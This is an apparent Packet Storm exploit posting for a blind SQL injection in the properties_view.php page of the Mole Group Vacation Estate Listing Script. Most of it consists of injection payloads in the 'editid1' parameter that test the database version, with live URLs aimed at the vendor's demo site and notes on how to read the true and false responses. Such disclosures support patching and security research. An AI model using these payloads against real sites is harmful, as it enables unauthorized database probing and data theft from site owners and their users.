Mole Group Vacation Estate Listing Script suffers from a blind SQL injection vulnerability.
3366765b77dc5f067174356d26ff21ddcfc1e4616ec3b7c66af10bc549fc6b52######################################
Vacation Estate Listing Blind Sql
######################################
Autore: x0r
Email: andry2000@hotmail.it
Site: https://w00tz0ne.altervista.org/index.php
Cms Demo: https://vacation.mole-group.com/
######################################
Bug in \properties_view.php
Exploit: properties_view.php?editid1=2 and substring(@@version,1,1)=4
properties_view.php?editid1=2 and substring(@@version,1,1)=5
# Sono solo esempi ovviamente ^ ^
Live Demo:
https://vacation.mole-group.com/properties_view.php?editid1=2%20and%20substring(@@version,1,1)=4
/ No Error /
https://vacation.mole-group.com/properties_view.php?editid1=2%20and%20substring(@@version,1,1)=5
/ Errors in the bottom of the page/
Greets: Children Of Ghaza....And My Sweety Girl <3
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed